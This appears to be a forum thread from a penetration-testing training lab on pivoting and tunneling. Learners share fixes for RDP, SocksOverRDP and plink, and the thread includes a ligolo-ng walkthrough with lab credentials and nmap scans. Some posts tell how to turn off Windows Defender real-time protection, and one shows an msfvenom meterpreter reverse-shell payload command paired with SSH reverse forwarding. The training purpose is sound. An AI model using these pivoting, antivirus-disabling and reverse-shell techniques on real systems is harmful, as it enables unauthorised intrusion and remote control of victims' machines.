I’m stuck here, when i try to connect with mstsc 172.16.5.19 i get a window saying that the remote computer is either turned off, not enabled or not available on the network. Can anyone give me any tips?
Just figured it out. Like the hint suggests, there’s a different format for logging in with a ‘local’ user.
Type .\victor and the password Manually , after you got the RDP
Try using xfreerdp with /timeout:30000 option.
I had the same problem as you
What I think caused that problem is running mstsc.exe from the command line
When I would run rdp from the command line proxifier wouldn’t proxy my connection at all… I would get no output in my logs showing that proxifier is not even attempting to redirect my packets to port 1080
When I went to the system32 directory in the file explorer and ran it that way then it worked
2 Likes
you are the goat! thank you
1 Like
Thanks a lot mate, you are a savior !!
Using ligolo-ng for Port Forwarding:
Download Link: Releases · nicocha30/ligolo-ng · GitHub
- Download the 2 files to set-up ligolo-ng
Agent File:
Proxy File:
- Unpack the 2 files:
tar -xvf ligolo-ng_agent_0.4.3_Linux_64bit.tar.gz
ligolo-ng_proxy_0.4.3_Linux_64bit.tar.gz
- Create a tun interface on the Proxy Server (C2):
sudo ip tuntap add user [your_username] mode tun ligolo
sudo ip link set ligolo up
- On your kali machine get ligolo running:
./proxy -selfcert -laddr 0.0.0.0:443
- SSH into the ubuntu server:
ssh -L 8080:localhost:8000 ubuntu@10.129.179.93
- Run the command on your kali to copy the file “agent” to the ubuntu server:
scp agent ubuntu@10.129.179.93:~/
-
Make the file name “agent” executable: chmod +x agent
-
On the ubuntu server use the agent that was downloaded to connect to the HTB IP:
./agent -connect 10.10.14.36:443 -ignore-cert
-
Go back to ligolo-ng to interact with the established connection use: session
-
On ligolo-ng use “ifconfig” to get the IP range:
172.16.5.129/23
- Use the command below to modify the routing table of a Linux system to direct network traffic destined for the IP Address range 172.16.4.0/23:
sudo ip route add 172.16.4.0/23 dev ligolo
- To shows the current routing table of your system use:
ip route
- Use the nmap scan to conduct a verbose host discovery scan on the IP range 172.16.5.1 to 172.16.5.200:
nmap -v -sn 172.16.5.1-200
Note: As you can see on the nmap scan the IP: 172.16.5.19, Host is up
- Use nmap again to scan the port 3389:
nmap -p 3389 --script rdp-enum-encryption,rdp-ntlm-info 172.16.5.19 > rdp_port_forward_scan.txt
- Go back to ligolo and start the tunnel to the ubuntu server by typing: start
- Try to ping the target host before establishing a RDP session: ping 172.16.5.19
- Now, you should be able to established a RDP session and get the flag:
xfreerdp /v:172.16.5.19 /u:victor /p:pass@123 /dynamic-resolution
1 Like
Use inspect in the page of apache
This solves the problem. I think in particular running the PowerShell as admin.
has anyone had any issues with supplying flag for Submit the contents of C:\Flag.txt located on the Domain Controller.
jee I had a tough time with that SocksOverRDP. The instability of these connections was surely an exercise for my patience and nerves
For anyone else who shows up…
Step 1: Disable Real-Time Protection
- Press Windows + I to open the Settings app.
- Go to Update & Security.
- Click on Windows Security on the left pane.
- Under Protection areas, click on Virus & threat protection.
- In the Virus & threat protection window, under Virus & threat protection settings, click on Manage settings.
- Toggle the switch under Real-time protection to Off.
Step 2: Add SocksOverRDP to Exclusions
- While still in the Virus & threat protection settings, scroll down to Exclusions.
- Click on Add or remove exclusions.
- Click on Add an exclusion, then select File from the dropdown menu.
- Navigate to the location of the SocksOverRDP file, select it, and click Open.
- The file will now be excluded from future scans and real-time protection.
1 Like
SSH for Windows: plink.exe
Optional Exercises
Has anyone managed to make a pivoting from an attacking Windows host?
I still haven’t been able to get the tool to work - plink.exe
And what will be the difference if I just run dynamic SSHforwarding on windows without plink.exe ?
I get the same error OVER and OVER no matter what I do even with all these tips posted.
open windows defender security. Go to virus and threat protection settings and disable Real Time Protection.
For anyone struggling with the page RDP and SOCKS Tunneling with SocksOverRDP
You can follow the instructions as is from the lesson. But when you connect from the first pivot host to the 172.16.5.19 pivot host, you need to make sure that you set your Experience to modem first. I tried without changing that setting for the first host and it blocked me from even getting a connection. Once I changed to modem for the 172.16.5.19 host, I was able to get through using the same SOCKS5 version as in the module.
For SockswithRDP,
If anyone doesn’t see their RDP connection in MSTSC.exe,
MSTSC has to be run in user mode and not in administrator mode.
I’m unable to get a reverse shell from the target in Reverse Port Forwarding with SSH.
The payload, now on the target, was crafted as follows:
msfvenom -p windows/x64/meterpreter/reverse_https LHOST= -f exe -o backupscript.exe LPORT=8080
Started a reverse handler on 0.0.0.0:8000
Trying to ssh using
ssh -R :8080:0.0.0.0:8000 ubuntu@ -vN
Nothing happens.
Do I need to somehow trigger the payload on the target before attempting to ssh or what am I missing here?